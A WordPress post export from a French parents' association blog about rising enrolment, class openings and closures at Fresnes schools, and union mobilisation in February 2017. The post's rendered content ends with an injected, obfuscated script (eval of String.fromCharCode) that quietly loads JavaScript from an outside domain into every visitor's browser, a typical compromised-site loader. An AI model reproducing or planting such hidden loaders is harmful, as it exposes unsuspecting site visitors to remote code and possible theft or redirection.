{"id":7526,"date":"2017-02-20T21:54:54","date_gmt":"2017-02-20T20:54:54","guid":{"rendered":"http:\/\/education.acctif.eu\/?p=7526"},"modified":"2018-01-23T16:43:15","modified_gmt":"2018-01-23T15:43:15","slug":"hausse-des-effectifs-en-2017-ouverture-dune-classe-a-blancs-bouleaux-et-roux-pasteur-alors","status":"publish","type":"post","link":"http:\/\/actifeducation.fr\/?p=7526","title":{"rendered":"Hausse des effectifs en 2017 : ouverture d&rsquo;une classe \u00e0 Blancs Bouleaux, et Roux-Pasteur alors ?"},"content":{"rendered":"<div dir=\"auto\">\n<div>\n<p>Les effectifs sont en hausse sur notre groupe scolaire\u00a0! D\u00e9j\u00e0 l&rsquo;an dernier, nous avions obtenu in extremis une ouverture de classe comme vous pouvez <a href=\"https:\/\/education.acctif.eu\/2016\/09\/02\/demande-douverture-de-classe-a-pasteur\/\"> le lire ici<\/a> et <a href=\"https:\/\/education.acctif.eu\/2016\/09\/02\/rentree-surchargee-a-pasteur\/\">ici<\/a>, et ce, aux lendemains de la rentr\u00e9e.<\/p>\n<p>Entre les CP qui arriveront nombreux de Blancs Bouleaux, la carte scolaire qui pr\u00e9voit un secteur flottant (les enfants sont scolaris\u00e9s soit sur Roux-Pasteur, soit sur Barbara selon les capacit\u00e9s d&rsquo;accueil des \u00e9coles, or Barbara est d\u00e9j\u00e0 \u00e0 saturation)&#8230; nul besoin d&rsquo;\u00eatre un savant statisticien pour anticiper une hausse des effectifs l&rsquo;an prochain sur Roux et Pasteur.<\/p>\n<p>Sans ouverture de classe, la situation promet d&rsquo;\u00eatre critique \u00e0 Roux et Pasteur \u00e0 la rentr\u00e9e prochaine. C&rsquo;est maintenant qu&rsquo;il faut se battre pour \u00e9viter le sc\u00e9nario de derni\u00e8re minute de la rentr\u00e9e 2016 ! On compte en effet actuellement une\u00a0moyenne de 26,87 \u00e9l\u00e8ves par classe \u00e0\u00a0Roux et de 27 \u00e0\u00a0Pasteur. Si aucune ouverture de classes n&rsquo;est act\u00e9e par l&rsquo;inspection acad\u00e9mique, il y a donc fort\u00a0\u00e0 parier que ce seuil sera franchi \u00e0 la rentr\u00e9e prochaine, ce qui ne permettrait alors pas \u00e0 nos enfants d&rsquo;\u00e9tudier dans de bonnes conditions. C&rsquo;est pourquoi nous tenons \u00e0 alerter l&rsquo;inspection acad\u00e9mique et nous nous mobilisons d&rsquo;ores-et-d\u00e9j\u00e0 pour obtenir une ouverture de classe \u00e0 Roux et \u00e0 Pasteur \u00e0\u00a0la rentr\u00e9e prochaine.<\/p>\n<p>D&rsquo;apr\u00e8s les derni\u00e8res informations diffus\u00e9es par les syndicats enseignants, 1 ouverture semble act\u00e9e sur Blancs Bouleaux. La maternelle comptera alors 10 classes \u00e0 la rentr\u00e9e 2017, ce qui n&rsquo;est pas sans pos\u00e9 de probl\u00e8mes d&rsquo;organisation avec un nouvel emplacement \u00e0 pr\u00e9voir pour une classe. Point qui sera une nouvelle fois \u00e9voqu\u00e9e en Conseil d&rsquo;\u00e9cole.<\/p>\n<figure id=\"attachment_7527\" aria-describedby=\"caption-attachment-7527\" style=\"width: 211px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/02\/ouverturefermetureclassefresnes2017.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-7527 size-medium\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/02\/ouverturefermetureclassefresnes2017.png?w=211\" alt=\"ouverturefermetureclassefresnes2017\" width=\"211\" height=\"300\" \/><\/a><figcaption id=\"caption-attachment-7527\" class=\"wp-caption-text\">Ouvertures et fermetures de classes pr\u00e9vues sur Fresnes \u00e0 la rentr\u00e9e 2017 (Source : syndicats enseignants)<\/figcaption><\/figure>\n<p>Sur ce m\u00eame document, on peut noter une fermeture de classe \u00e0 Barbara. Il s&rsquo;agit d&rsquo;une classe de maternelle. En raison des secteurs flottants pr\u00e9vus par la carte scolaire, le transfert d&rsquo;\u00e9l\u00e8ves de maternelle de Barbara \u00e0 Blancs Bouleaux entra\u00eene\u00a0en effet m\u00e9caniquement une ouverture de classe \u00e0 Blancs Bouleaux et une fermeture \u00e0 Barbara. Une situation contre laquelle se mobilise les enseignants, qui organisent une r\u00e9union d&rsquo;information ce jeudi 23 f\u00e9vrier \u00e0 18 heures.\u00a0Est \u00e9galement confirm\u00e9e une ouverture en \u00e9l\u00e9mentaire, comme le demandent les enseignants dans le tract ci-dessous.\u00a0<a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/02\/ouverturefermetureclassefresnes20171.png\"><br \/>\n<\/a><\/p>\n<figure id=\"attachment_7529\" aria-describedby=\"caption-attachment-7529\" style=\"width: 219px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/02\/screen-shot-2017-02-20-at-9-35-18-pm.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-7529 size-medium\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/02\/screen-shot-2017-02-20-at-9-35-18-pm.png?w=219\" alt=\"Barbara Mobilisation Fermeture Classe\" width=\"219\" height=\"300\" \/><\/a><figcaption id=\"caption-attachment-7529\" class=\"wp-caption-text\">Tract distribu\u00e9 par les enseignants \u00e0 l&rsquo;\u00e9cole Barbara<\/figcaption><\/figure>\n<p>Afin d&rsquo;obtenir davantage d&rsquo;ouverture de classes, les syndicats enseignants (SNUipp-FSU, Snudi-FO, CGT) demandent qu&rsquo;une d\u00e9l\u00e9gation soit re\u00e7ue par l&rsquo;inspectrice acad\u00e9mique <strong>vendredi 24 f\u00e9vrier \u00e0 13h30<\/strong>.Le syndicat SNUipp-FSU du 94 appelle les enseignants \u00e0 la gr\u00e8ve ce vendredi. A suivre, donc&#8230;<\/p>\n<\/div>\n<\/div>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les effectifs sont en hausse sur notre groupe scolaire\u00a0! D\u00e9j\u00e0 l&rsquo;an dernier, nous avions obtenu in extremis une ouverture de classe comme vous pouvez le lire ici et ici, et ce, aux lendemains de la rentr\u00e9e. Entre les CP qui arriveront nombreux de Blancs Bouleaux, la carte scolaire qui pr\u00e9voit un secteur flottant (les enfants &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"http:\/\/actifeducation.fr\/?p=7526\"> <span class=\"screen-reader-text\">Hausse des effectifs en 2017 : ouverture d&rsquo;une classe \u00e0 Blancs Bouleaux, et Roux-Pasteur alors ?<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":7640,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[35,36,37],"tags":[],"class_list":["post-7526","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blancs-bouleaux","category-pasteur","category-roux"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7526","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7526"}],"version-history":[{"count":3,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7526\/revisions"}],"predecessor-version":[{"id":7654,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7526\/revisions\/7654"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/media\/7640"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7526"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}